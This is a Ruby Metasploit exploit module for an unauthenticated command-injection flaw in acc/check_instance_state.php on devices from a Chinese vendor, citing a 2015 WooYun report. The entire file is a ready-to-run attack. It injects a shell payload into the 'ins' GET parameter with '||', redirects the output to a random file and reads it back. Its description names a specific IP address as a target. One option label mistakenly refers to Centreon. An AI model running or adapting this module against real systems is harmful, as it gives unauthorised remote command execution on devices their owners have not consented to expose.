require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
                      'Name' => '华夏创新四种设备产品存在通用命令执行直接getshell',
                      'Description' => %q{
                            acc/check_instance_state.php,无需登录等认证即可执行任意系统命令 https://113.240.230.108
      },
                      'Author' =>
                          [
                              '	路人甲',
                              '扶摇直上打飞机'
                          ],
                      'License' => MSF_LICENSE,
                      'References' =>
                          [
                              ['url', 'http://www.wooyun.org/bugs/wooyun-2015-0133750']
                          ],
                      'Privileged' => true,
                      'Platform' => ['unix'],
                      'Targets' => [['all of them', {}],],
                      'Arch' => ARCH_CMD,
                      'DefaultTarget' => 0,
          ))
    register_options(
        [
            Opt::RHOST(),
            Opt::RPORT(443),
            OptString.new('TARGETURI', [true, 'The URI of the Centreon Application', '/']),
        ], self.class)
  end

  def post_payload
    @fname = "#{rand_text_alphanumeric(rand(10)+6)}.txt"
    print_status("start to exploit ....")
    res = send_request_cgi(
        {
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'acc', 'check_instance_state.php'),
            'headers' =>
                {
                    "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
                },
            'vars_get' =>
                {
                    'ins' => "test || #{payload.encoded}>#{@fname}",
                }
        }, 4)
  end

  def getresult
    res = send_request_cgi(
        {
            'method' => 'GET',
            'uri' => normalize_uri(target_uri.path, 'acc', @fname),
            'headers' =>
                {
                    "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0",
                },
        }, 4)
    print_good(res.body)
  end

  def exploit
    post_payload
    getresult
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def targeturi
    datastore['TARGETURI']
  end

end
